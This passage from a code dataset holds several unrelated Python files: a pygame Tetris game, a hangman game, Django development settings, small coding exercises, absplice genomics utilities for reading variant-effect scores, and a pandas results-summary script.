self._bgcolor=[0,0,0]\r\n    \r\n    def add_block(self,block):\r\n        for rect in block.get_rect_arr():\r\n            self.rect_arr.append(rect)\r\n\r\n    def change_block(self):\r\n        if self.moving_block:\r\n            new_arr = self.moving_block.change()\r\n            if new_arr and not self.check_overlap(0, 0, check_arr=new_arr): \r\n                self.moving_block.rect_arr=new_arr\r\n\r\n    def create_move_block(self):\r\n        block = create_block()\r\n        block.move(5-2,-2) \r\n        self.moving_block=block\r\n\r\n    def check_overlap(self, diffx, diffy, check_arr=None):\r\n        if check_arr is None: check_arr = self.moving_block.get_rect_arr()\r\n        for x,y in check_arr:\r\n            for rx,ry in self.rect_arr:\r\n                if x+diffx==rx and y+diffy==ry:\r\n                    return True\r\n        return False\r\n\r\n    def control_block(self, diffx, diffy):\r\n        if self.moving_block.can_move(diffx,diffy) and not self.check_overlap(diffx, diffy):\r\n            self.moving_block.move(diffx,diffy)\r\n\r\n    def check_clear(self):\r\n        pass\r\n\r\n    def move_block(self):\r\n        if self.moving_block is None: self.create_move_block()\r\n        if self.moving_block.can_move(0,1) and not self.check_overlap(0,1): \r\n            self.moving_block.move(0,1)\r\n        else:\r\n            self.add_block(self.moving_block)\r\n            self.check_clear()\r\n            self.create_move_block()\r\n\r\n    def paint(self):\r\n        mid_x=self._x+self._width/2\r\n        pygame.draw.line(self._bg,self._bgcolor,[mid_x,self._y],[mid_x,self._y+self._height],self._width) \r\n        \r\n        # draw the blocks that have already landed\r\n        bz=self._block_size\r\n        for rect in self.rect_arr:\r\n            x,y=rect\r\n            pygame.draw.line(self._bg,[0,0,255],[self._x+x*bz+bz/2,self._y+y*bz],[self._x+x*bz+bz/2,self._y+(y+1)*bz],bz)\r\n            pygame.draw.rect(self._bg,[255,255,255],[self._x+x*bz,self._y+y*bz,bz+1,bz+1],1)\r\n        \r\n        # draw the currently falling block\r\n        if self.moving_block:\r\n            for rect in self.moving_block.get_rect_arr():\r\n                x,y=rect\r\n                pygame.draw.line(self._bg,[0,0,255],[self._x+x*bz+bz/2,self._y+y*bz],[self._x+x*bz+bz/2,self._y+(y+1)*bz],bz)\r\n                pygame.draw.rect(self._bg,[255,255,255],[self._x+x*bz,self._y+y*bz,bz+1,bz+1],1)\r\n\r\n\r\nclass Block(object):\r\n    sx=0\r\n    sy=0\r\n    def __init__(self):\r\n        self.rect_arr=[]\r\n\r\n    def get_rect_arr(self): \r\n        return self.rect_arr\r\n\r\n    def move(self,xdiff,ydiff): \r\n        self.sx+=xdiff\r\n        self.sy+=ydiff\r\n        self.new_rect_arr=[]\r\n        for x,y in self.rect_arr:\r\n            self.new_rect_arr.append((x+xdiff,y+ydiff))\r\n        self.rect_arr=self.new_rect_arr\r\n\r\n    def can_move(self,xdiff,ydiff):\r\n        for x,y in self.rect_arr:\r\n            if y+ydiff>=20: return False\r\n            if x+xdiff<0 or x+xdiff>=10: return False\r\n        return True\r\n    \r\n    def change(self):\r\n        self.shape_id+=1\r\n        if self.shape_id >= self.shape_num:\r\n            self.shape_id=0\r\n        \r\n        arr = self.get_shape()\r\n        new_arr = []\r\n        for x,y in arr:\r\n            if x+self.sx<0 or x+self.sx>=10:\r\n                self.shape_id -= 1\r\n                if self.shape_id < 0:\r\n                    self.shape_id = self.shape_num - 1\r\n                return None\r\n\r\n            new_arr.append([x+self.sx, 
y+self.sy])\n\n return new_arr\n\n\nclass LongBlock(Block):\n shape_id=0\n shape_num=2\n def __init__(self, n=None): \n super(LongBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(1,3)] \n else: return [(0,2),(1,2),(2,2),(3,2)]\n\nclass SquareBlock(Block): \n shape_id=0\n shape_num=1\n def __init__(self, n=None):\n super(SquareBlock, self).__init__()\n self.rect_arr=[(1,1),(1,2),(2,1),(2,2)]\n\n def get_shape(self):\n return self.rect_arr\n\nclass ZBlock(Block): \n shape_id=0\n shape_num=2\n def __init__(self, n=None):\n super(ZBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n \n def get_shape(self):\n if self.shape_id==0: \n return [(2,0),(2,1),(1,1),(1,2)]\n else:\n return [(0,1),(1,1),(1,2),(2,2)]\n\n\nclass SBlock(Block): \n shape_id=0\n shape_num=2\n def __init__(self, n=None):\n super(SBlock, self).__init__()\n if n is None: n=random.randint(0,1)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0:\n return [(1,0),(1,1),(2,1),(2,2)] \n else:\n return [(0,2),(1,2),(1,1),(2,1)]\n\nclass LBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(LBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(2,2)]\n elif self.shape_id==1: return [(0,1),(1,1),(2,1),(0,2)]\n elif self.shape_id==2: return [(0,0),(1,0),(1,1),(1,2)]\n else: return [(0,1),(1,1),(2,1),(2,0)]\n\nclass JBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(JBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(1,0),(1,1),(1,2),(0,2)]\n elif self.shape_id==1: return [(0,1),(1,1),(2,1),(0,0)]\n elif self.shape_id==2: return [(2,0),(1,0),(1,1),(1,2)]\n else: return [(0,1),(1,1),(2,1),(2,2)]\n\nclass TBlock(Block): \n shape_id=0\n shape_num=4\n def __init__(self, n=None):\n super(TBlock, self).__init__()\n if n is None: n=random.randint(0,3)\n self.shape_id=n\n self.rect_arr=self.get_shape()\n\n def get_shape(self):\n if self.shape_id==0: return [(0,1),(1,1),(2,1),(1,2)]\n elif self.shape_id==1: return [(1,0),(1,1),(1,2),(0,1)]\n elif self.shape_id==2: return [(0,1),(1,1),(2,1),(1,0)]\n else: return [(1,0),(1,1),(1,2),(2,1)]\n \n\ndef create_block():\n n = random.randint(0,19)\n if n==0: return SquareBlock(n=0)\n elif n==1 or n==2: return LongBlock(n=n-1)\n elif n==3 or n==4: return ZBlock(n=n-3)\n elif n==5 or n==6: return SBlock(n=n-5)\n elif n>=7 and n<=10: return LBlock(n=n-7)\n elif n>=11 and n<=14: return JBlock(n=n-11)\n else: return TBlock(n=n-15)\n\nif __name__ == '__main__':\n pygame.init()\n space=30\n main_block_size=30\n main_panel_width=main_block_size*10\n main_panel_height=main_block_size*20\n screencaption = pygame.display.set_caption('Tetris')\n screen = pygame.display.set_mode((main_panel_width+160+space*3,main_panel_height+space*2))\n main_panel=Panel(screen,main_block_size,[space,space,main_panel_width,main_panel_height])\n\n pygame.key.set_repeat(200, 30)\n main_panel.create_move_block()\n\n diff_ticks = 300 \n ticks = pygame.time.get_ticks() + diff_ticks\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if 
event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a: main_panel.control_block(-1,0)\n if event.key == pygame.K_d: main_panel.control_block(1,0)\n if event.key == pygame.K_q: main_panel.change_block()\n if event.key == pygame.K_s: main_panel.control_block(0,1)\n \n screen.fill((100,100,100)) \n main_panel.paint() \n\n pygame.display.update() \n\n if pygame.time.get_ticks() >= ticks:\n ticks+=diff_ticks\n main_panel.move_block()\n\n","repo_name":"wma8/workbench","sub_path":"Games/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":8102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38691409892","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 30 23:25:35 2021\n\n@author: admin\n\"\"\"\n\nfrom visual_dictionary import lives_visual_dict\n \n \n\nword = \"ozkancondeka\" # Pick a word at the beginning.\nre = len(word)*\"_ \"\nstr_out = []\nls = []\nls2=list(\"-\"*len(word))\nc = 1\n \nprint(\"Welcome to HANGMAN-GAME.\\nYou need to enter a letter! \")\nwhile c <= len(lives_visual_dict)+1:\n ch = input(\"Type a letter: \")\n \n if ch in word:\n print(f\"Correct! {ch} is in word {word.count(ch)} times.\")\n for x in word:\n if x == ch:\n ls.append(ch)\n else:\n ls.append(\"-\")\n str_out.append(ls)\n ls = []\n \n for i in range(len(str_out[0])):\n for j in range(len(str_out)):\n if str_out[j][i] != \"-\":\n ls2[i]=str_out[j][i]\n \n \n print(\"\".join(ls2))\n \n \n \n \n # word = word.replace(ch,\"\",word.count(ch)) \n \n c -= 1\n \n if \"\".join(ls2) == word:\n print(\"You win!!\")\n break\n \n \n else:\n result = lives_visual_dict[len(lives_visual_dict)-c]\n print(f\"{ch} not in word. You have {len(lives_visual_dict)-c} more wrong right.\")\n print(\"\".join(ls2))\n print(result)\n \n if result == lives_visual_dict[0]:\n \n print(\"You losed!!!\") \n break\n c+=1\n \n \n \n \n \n ","repo_name":"ozkancondek/clarusway_python","sub_path":"my_projects/hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73109517363","text":"from .base import * # noqa\nfrom .base import env\n\n# GENERAL\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\nSECRET_KEY = env(\n \"DJANGO_SECRET_KEY\",\n default=\"NttXndNmgnudwb1d7z683YBcJqtItrWhtWiGMGrI0aQYdt39LEDRJLSfRywhUcWx\",\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts\nWEBHOOK_URL = env(\n \"WEBHOOK_URL\",\n default=\"error\",\n) # Telegram webhook url\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\", \"easynote\", WEBHOOK_URL.split('//')[1]]\n\n# CACHES\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#caches\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n \"LOCATION\": \"\",\n }\n}\n\n# EMAIL\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-host\nEMAIL_HOST = env(\"EMAIL_HOST\", default=\"mailhog\")\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-port\nEMAIL_PORT = 1025\n\n# WhiteNoise\n# ------------------------------------------------------------------------------\n# 
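`Panel.check_clear` in the tetris record is left as `pass`. A sketch of the intended row clearing for this 10-cell-wide board (an assumption about the author's intent, not their code):

```python
def check_clear(self):
    rows = {}
    for x, y in self.rect_arr:
        rows.setdefault(y, []).append(x)
    # clear full rows top-down, shifting everything above them one cell down
    for fy in sorted(y for y, xs in rows.items() if len(xs) >= 10):
        self.rect_arr = [(x, y + 1) if y < fy else (x, y)
                         for x, y in self.rect_arr if y != fy]
```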
http://whitenoise.evans.io/en/latest/django.html#using-whitenoise-in-development\nINSTALLED_APPS = [\"whitenoise.runserver_nostatic\"] + INSTALLED_APPS # noqa F405\n\nDEBUG_APP = list()\nDEBUG_APP += ['django-silk']\n#DEBUG_APP += ['django-debug-toolbar']\n#DEBUG_APP += ['django-queryinspect']\n\n# django-silk\n# ------------------------------------------------------------------------------\n# https://github.com/jazzband/django-silk\nif 'django-silk' in DEBUG_APP:\n INSTALLED_APPS += [\"silk\"]\n MIDDLEWARE += [\"silk.middleware.SilkyMiddleware\"]\n SILKY_ANALYZE_QUERIES = True\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#prerequisites\nif 'django-debug-toolbar' in DEBUG_APP:\n INSTALLED_APPS += [\"debug_toolbar\"] # noqa F405\n # https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#middleware\n MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa F405\n # https://django-debug-toolbar.readthedocs.io/en/latest/configuration.html#debug-toolbar-config\n DEBUG_TOOLBAR_CONFIG = {\n \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirects.RedirectsPanel\"],\n \"SHOW_TEMPLATE_CONTEXT\": True,\n }\n# https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#internal-ips\nINTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\nif env(\"USE_DOCKER\") == \"yes\":\n import socket\n\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS += [\".\".join(ip.split(\".\")[:-1] + [\"1\"]) for ip in ips]\n\n# django-extensions\n# ------------------------------------------------------------------------------\n# https://django-extensions.readthedocs.io/en/latest/installation_instructions.html#configuration\nINSTALLED_APPS += [\"django_extensions\"] # noqa F405\n# Celery\n# ------------------------------------------------------------------------------\n# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-eager-propagates\nCELERY_TASK_EAGER_PROPAGATES = True\n# Your stuff...\n# ------------------------------------------------------------------------------\n\n# django-queryinspect\n# https://github.com/dobarkod/django-queryinspect\nif 'django-queryinspect' in DEBUG_APP:\n QUERY_INSPECT_ENABLED = True\n QUERY_INSPECT_LOG_QUERIES = True\n QUERY_INSPECT_LOG_TRACEBACKS = True\n QUERY_INSPECT_LOG_STATS = True\n MIDDLEWARE += (\n 'qinspect.middleware.QueryInspectMiddleware',\n )\n LOGGING['loggers'] = {\n 'qinspect': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n }\n","repo_name":"ghostforpy/bonds-docker","sub_path":"config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33428825548","text":"# 5097. 
[Python S/W Problem Solving Basics] Day 6 - Rotation\n\n\n# ############################################\n# using queue:\n\nimport sys\nsys.stdin = open('input5097.txt', 'r')\n\ndef enQueue(item):\n global Q, rear\n rear += 1\n Q[rear] = item\n\ndef deQueue():\n global Q, front\n front += 1\n return Q[front]\n\nfor T in range(int(input())):\n N, M = map(int, input().split())\n num = input().split()\n\n Q = [0] * (M + N)\n front = rear = -1\n for i in range(N):\n enQueue(num[i])\n for _ in range(M):\n tmp = deQueue()\n enQueue(tmp)\n\n print(f\"#{T+1} {Q[front+1]}\")\n\n\n\n\n\n###########################################\n# for T in range(int(input())):\n#     N, M = map(int, input().split())\n#     num = input().split()\n#     M = M % N\n#     print(f\"#{T+1} {num[M]}\")","repo_name":"jiwonjulietyoon/Algorithm","sub_path":"Tasks/1_IM/190226-1.py","file_name":"190226-1.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17709054664","text":"\"\"\"\nHow Bootcamps - Stone - /código[s]\nAuthor: Henrique Junqueira Branco\n\nProblem statement: \nGiven H = 1 + 1/2 + 1/3 + 1/4 + ... + 1/N, write a program that computes the value of H with N terms.\n\"\"\"\n\nN = int(input(\"Enter the value of N: \"))\n\nH = 0\n\n# The variable i starts at 1 and goes up to N.\n# Since range excludes its stop value N, we add 1 to it.\nfor i in range(1, N + 1):\n H += 1 / i\n\nprint(H)\n","repo_name":"howbootcamps/pythoncodigos","sub_path":"Exercícios/Gabaritos/05-laço-repetição/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"pt","doc_type":"code","stars":29,"dataset":"github-code","pt":"75"} +{"seq_id":"36890223470","text":"import pandas as pd\nimport numpy as np\nfrom pyranges import PyRanges\nimport pathlib\nfrom kipoiseq import Interval\nfrom kipoiseq.extractors.vcf import MultiSampleVCF\nfrom kipoiseq.extractors.vcf_query import BaseVariantQuery\nfrom collections import namedtuple\nfrom typing import List\n\n\ndef get_abs_max_rows(df, groupby, max_col, dropna=True):\n return df.reset_index() \\\n .sort_values(by=max_col, key=abs, ascending=False) \\\n .drop_duplicates(subset=groupby) \\\n .set_index(groupby)\n \ndef expit(x):\n return 1. / (1. 
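The commented-out block at the bottom of the rotation record already hints that rotating N items M times just indexes position M % N; collections.deque shows the equivalence without a hand-rolled ring buffer. A sketch with toy values:

from collections import deque

def after_rotations(nums, m):
    q = deque(nums)
    q.rotate(-m)           # m dequeue/enqueue rounds in one call
    return q[0]

assert after_rotations([1, 2, 3], 2) == [1, 2, 3][2 % 3] == 3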
+ np.exp(-x))\n\n\ndef delta_logit_PSI_to_delta_PSI(delta_logit_psi, ref_psi,\n genotype=None, clip_threshold=0.001):\n ref_psi = clip(ref_psi, clip_threshold)\n pred_psi = expit(delta_logit_psi + logit(ref_psi))\n\n if genotype is not None:\n pred_psi = np.where(np.array(genotype) == 1,\n (pred_psi + ref_psi) / 2,\n pred_psi)\n\n return pred_psi - ref_psi\n\n\ndef clip(x, clip_threshold=0.01):\n return np.clip(x, clip_threshold, 1 - clip_threshold)\n\n\ndef logit(x, clip_threshold=0.01):\n x = clip(x, clip_threshold=clip_threshold)\n return np.log(x) - np.log(1 - x)\n\n\ndef normalize_gene_annotation(df, gene_map, key='gene_name', value='gene_id'):\n if isinstance(gene_map, dict):\n pass\n elif isinstance(gene_map, pathlib.PosixPath) or isinstance(gene_map, str):\n gene_map = read_csv(gene_map)\n gene_map = dict(zip(gene_map[key], gene_map[value]))\n elif isinstance(gene_map, pd.DataFrame):\n gene_map = dict(zip(gene_map[key], gene_map[value]))\n else:\n TypeError(\"gene_mapping needs to be dictionary, pandas DataFrame or path\")\n df[value] = df[key].map(gene_map)\n return df\n\n\ndef read_csv(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n return path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n return pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n return pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n return pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n \n \ndef filter_samples_with_RNA_seq(df, samples_for_tissue):\n \"\"\"\n samples_for_tissue: Dict, keys: tissue, values: samples with RNA-seq for respective tissue\n \"\"\"\n l = list()\n for tissue, samples in samples_for_tissue.items():\n df_with_RNA = df[(df['tissue'] == tissue) & (df['sample'].isin(samples))]\n l.append(df_with_RNA)\n return pd.concat(l)\n\n\ndef inject_new_row(df, new_row_dict):\n new_row = pd.DataFrame(df[-1:].values, columns=df.columns)\n for k,v in new_row_dict.items():\n new_row[k] = v\n return pd.concat([df, new_row])\n\n\ndef read_spliceai(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n return path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n return pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n return pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n return pd.read_parquet(path, **kwargs)\n elif path.suffix.lower() == '.vcf' or str(path).endswith('.vcf.gz'):\n return read_spliceai_vcf(path)\n else:\n raise ValueError(\"unknown file ending.\")\n\n\ndtype_columns_spliceai = {\n 'variant': pd.StringDtype(), \n 'gene_name': pd.StringDtype(), \n 'delta_score': 'float64',\n 'acceptor_gain': 'float64', \n 'acceptor_loss': 'float64',\n 'donor_gain': 'float64', \n 'donor_loss': 'float64',\n 'acceptor_gain_position': 'Int64',\n 'acceptor_loss_positiin': 'Int64',\n 'donor_gain_position': 'Int64',\n 'donor_loss_position': 'Int64',\n}\n\ndef read_spliceai_vcf(path):\n columns = ['gene_name', 'delta_score',\n 'acceptor_gain', 'acceptor_loss',\n 'donor_gain', 'donor_loss',\n 'acceptor_gain_position',\n 'acceptor_loss_positiin',\n 'donor_gain_position',\n 'donor_loss_position']\n rows = list()\n for variant in MultiSampleVCF(path):\n row_all = variant.source.INFO.get('SpliceAI')\n if 
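delta_logit_PSI_to_delta_PSI above shifts the reference PSI on the logit scale and maps it back through the sigmoid. One worked number, assuming no heterozygous-genotype averaging and a reference PSI already inside the clip bounds:

import numpy as np

ref_psi, delta_logit = 0.8, -2.0
logit_ref = np.log(ref_psi / (1 - ref_psi))                  # about 1.386
pred_psi = 1.0 / (1.0 + np.exp(-(delta_logit + logit_ref)))
print(round(pred_psi - ref_psi, 3))                          # -0.449, a strong drop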
row_all:\n for row in row_all.split(','):\n results = row.split('|')[1:]\n results = [0 if e == '.' else e for e in results]\n scores = np.array(list(map(float, results[1:])))\n spliceai_info = [results[0], scores[:4].max(), *scores]\n rows.append({\n **{'variant': str(variant)}, \n **dict(zip(columns, spliceai_info))})\n df = pd.DataFrame(rows)\n \n for col in df.columns:\n if col in dtype_columns_spliceai.keys():\n df = df.astype({col: dtype_columns_spliceai[col]})\n \n return df\n\n\ndef _add_variant_col(row):\n if '#Chrom' in row:\n return str(row['#Chrom']).replace('chr', '') + ':' + str(row['Pos']) + ':' + row['Ref'] + '>' + row['Alt']\n elif 'chrom' in row:\n return str(row['chrom']).replace('chr', '') + ':' + str(row['pos']) + ':' + row['ref'] + '>' + row['alt']\n else:\n raise NotImplementedError()\n\n\ndef _add_variant(df):\n if 'variant' in df.reset_index().columns:\n return df\n else:\n df['variant'] = df.apply(lambda x: _add_variant_col(x), axis=1)\n # df['variant'] = df['variant'].astype(pd.StringDtype())\n return df\n \n \ndef _check_gene_id(df):\n if 'GeneID' in df.columns:\n df = df.rename(columns={'GeneID': 'gene_id'})\n if 'gene_id' not in df.columns:\n raise ValueError(\"Please add gene_id.\")\n return df\n\n \ndef read_cadd_splice(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n df = path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n df = pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n df = pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n df = pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n df = _add_variant(df)\n df = _check_gene_id(df)\n return df\n\n\ndef read_absplice(path, **kwargs):\n if isinstance(path, pd.DataFrame):\n df = path\n else:\n if not isinstance(path, pathlib.PosixPath):\n path = pathlib.Path(path)\n if path.suffix.lower() == '.csv' or str(path).endswith('.csv.gz'):\n df = pd.read_csv(path, **kwargs)\n elif path.suffix.lower() == '.tsv' or str(path).endswith('.tsv.gz'):\n df = pd.read_csv(path, sep='\\t', **kwargs)\n elif path.suffix.lower() == '.parquet':\n df = pd.read_parquet(path, **kwargs)\n else:\n raise ValueError(\"unknown file ending.\")\n df = _add_variant(df)\n return df\n\n\ndef annotate_junctions_DROP(df):\n if 'chr' not in df['seqnames'].astype(str).values[0]:\n df['seqnames'] = df['seqnames'].astype(str)\n df['seqnames'] = df['seqnames'].apply(lambda x: 'chr' + x)\n df['junctions'] = df['seqnames'].astype(str) + ':' \\\n + (df['start'] - 1).astype(str) + '-' \\\n + df['end'].astype(str) + ':' \\\n + df['strand'].map(lambda x: x if x == '-' else '+')\n return df\n\n\nclass VariantMafFilter(BaseVariantQuery):\n\n def __init__(self, cutoff, population=None, not_in_population=True):\n self.population = population\n self.cutoff = cutoff\n self.not_in_population = not_in_population\n\n def __call__(self, v):\n if self.population:\n v = str(v)\n return self.population[v] <= self.cutoff \\\n if v in self.population else self.not_in_population\n else:\n return v.source.aaf <= self.cutoff\n\n\nclass PrivateVariantFilter(BaseVariantQuery):\n\n def __init__(self, vcf, max_num_samples=2):\n self.vcf = vcf\n self.max_num_sample = max_num_samples\n\n def __call__(self, v):\n return len(self.vcf.get_samples(v)) <= self.max_num_sample\n\n\nclass ReadDepthFilter(BaseVariantQuery):\n\n def __init__(self, vcf, 
min_read=10, sample_id=None):\n self.sample_mapping = vcf.sample_mapping\n self.min_read = min_read\n self.sample_id = sample_id\n\n def __call__(self, v):\n gt_depth = v.source.gt_alt_depths\n if self.sample_id:\n depth = gt_depth[self.sample_mapping[self.sample_id]]\n else:\n depth = min(gt_depth)\n return depth >= self.min_read\n\n\nclass GQFilter(BaseVariantQuery):\n\n def __init__(self, vcf, min_GQ=80, sample_id=None):\n self.sample_mapping = vcf.sample_mapping\n self.min_GQ = min_GQ\n self.sample_id = sample_id\n\n def __call__(self, v):\n gt_quals = v.source.gt_quals\n if self.sample_id:\n GQ = gt_quals[self.sample_mapping[self.sample_id]]\n else:\n GQ = max(gt_quals)\n return GQ >= self.min_GQ\n \n \nclass LongVariantFilter(BaseVariantQuery):\n\n def __init__(self, vcf, max_length=10):\n self.vcf = vcf\n self.max_length = max_length\n\n def __call__(self, v):\n v = left_normalized(v)\n length = max(len(v.ref), len(v.alt))\n return length < self.max_length\n \n \nclass Junction(Interval):\n\n @property\n def acceptor(self):\n return self.start if self.strand == '-' else self.end\n\n @property\n def donor(self):\n return self.end if self.strand == '-' else self.start\n\n def dinucleotide_region(self):\n return Interval(self.chrom, self.start, self.start + 2), \\\n Interval(self.chrom, self.end - 2, self.end)\n\n def acceptor_region(self, overhang=(250, 250)):\n return Interval(self.chrom, self.acceptor,\n self.acceptor, strand=self.strand) \\\n .slop(upstream=overhang[0], downstream=overhang[1])\n\n def donor_region(self, overhang=(250, 250)):\n return Interval(self.chrom, self.donor,\n self.donor, strand=self.strand) \\\n .slop(upstream=overhang[0], downstream=overhang[1])\n \n \ndef get_splice_site_intervals(junction, overhang=(250, 250)):\n junction = Junction.from_str(junction) if type(\n junction) == str else junction\n\n acceptor = junction.acceptor_region(overhang=overhang)\n donor = junction.donor_region(overhang=overhang)\n return [acceptor, donor]\n\ndef get_unique_splice_site_intervals_in_event(event, overhang=(250, 250)):\n sites = list()\n for junction in event:\n sites.append(get_splice_site_intervals(junction, overhang))\n sites = [item for sublist in sites for item in sublist]\n sites = list(set(sites))\n return sites\n \ndef intervals_to_pyranges(intervals: List[Interval]) -> PyRanges:\n \"\"\"\n Create pyrange object given list of intervals objects.\n Args:\n intervals: list of interval objects have CHROM, START, END, properties.\n \"\"\"\n import pyranges\n df = pd.DataFrame([\n (\n i.chrom,\n i.start,\n i.end,\n i\n )\n for i in intervals\n ], columns=['Chromosome', 'Start', 'End', 'interval'])\n return pyranges.PyRanges(df)\n","repo_name":"gagneurlab/absplice","sub_path":"absplice/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11725,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"75"} +{"seq_id":"26819016804","text":"import numpy as np\nimport pandas as pd\nimport sys, getopt\n\ncols = ['Map', 'Shield', '# iterations', 'ep_train', 'steps_train', 'coll_train',\n 'acc_0_train', 'inter_0_train', 'acc_1_train', 'inter_1_train']\ndata_cols = ['coll_train', 'acc_0_train', 'inter_0_train', 'acc_1_train', 'inter_1_train']\nbase = ['Map', 'Shield', 'Grid']\nextra = ['std_dev_0', 'std_dev_1', 'mean_acc', 'mean_std']\n\n# parse arguments\ndef get_options(debug=False):\n opts, args = getopt.getopt(\n sys.argv[1:],\n 'f:',\n ['file'],\n )\n\n filename = None\n\n for opt, arg in opts:\n if opt in ('-f', 
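The Junction properties above encode a strand convention worth spelling out: on '+' the donor sits at the interval start and the acceptor at the end, and '-' swaps them. The same rule stripped of the kipoiseq Interval machinery, with made-up coordinates:

def donor(start, end, strand):
    return end if strand == "-" else start

def acceptor(start, end, strand):
    return start if strand == "-" else end

assert (donor(100, 200, "+"), acceptor(100, 200, "+")) == (100, 200)
assert (donor(100, 200, "-"), acceptor(100, 200, "-")) == (200, 100)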
'--file'):\n filename = str(arg)\n if debug:\n print(opt + ': ' + arg)\n\n return filename\n\n\n\ndef process_df(filename):\n\n df = pd.read_csv(filename, index_col=False, usecols=cols, sep='\\t')\n\n print(df)\n\n num_iterations = df['# iterations'].iloc[0]\n num_episodes = df['ep_train'].iloc[0]\n maps = df['Map'].unique()\n\n sum_df = pd.DataFrame(columns=base + data_cols + extra)\n print(sum_df)\n\n row = {}\n row['Shield'] = df['Shield'].iloc[0]\n row['Grid'] = 1 if 'grid' in filename else 0\n\n for m, map in enumerate(maps):\n row['Map'] = map\n\n for e in range(num_episodes):\n for col in data_cols:\n sum = 0\n data = []\n for i in range(num_iterations):\n sum += df[col].iloc[e + i * num_episodes + (num_episodes * num_iterations) * m]\n data.append(df[col].iloc[e + i * num_episodes + (num_episodes * num_iterations) * m])\n\n row[col] = sum / 10.0\n if 'acc' in col:\n row['std_dev_' + col[4:5]] = np.std(data)\n\n sum_df = sum_df.append(row, ignore_index=True)\n\n sum_df['mean_acc'] = sum_df[[data_cols[1], data_cols[3]]].mean(axis=1)\n sum_df['mean_std'] = sum_df[['std_dev_0', 'std_dev_1']].mean(axis=1)\n\n print(sum_df)\n print(sum_df.describe())\n\n new_file = 'graph_data/' + filename[5:-4] + '_'\n # sum_df.to_csv(new_file, encoding='utf-8')\n for map in maps:\n print('---- Saving ' + map)\n temp = sum_df[sum_df['Map'] == map]\n temp.to_csv(new_file+map+'.csv', encoding='utf-8')\n\nif __name__ == \"__main__\":\n filename = get_options(debug=True)\n\n if filename is None:\n print('Error: No path provided \\n')\n exit(1)\n\n else:\n 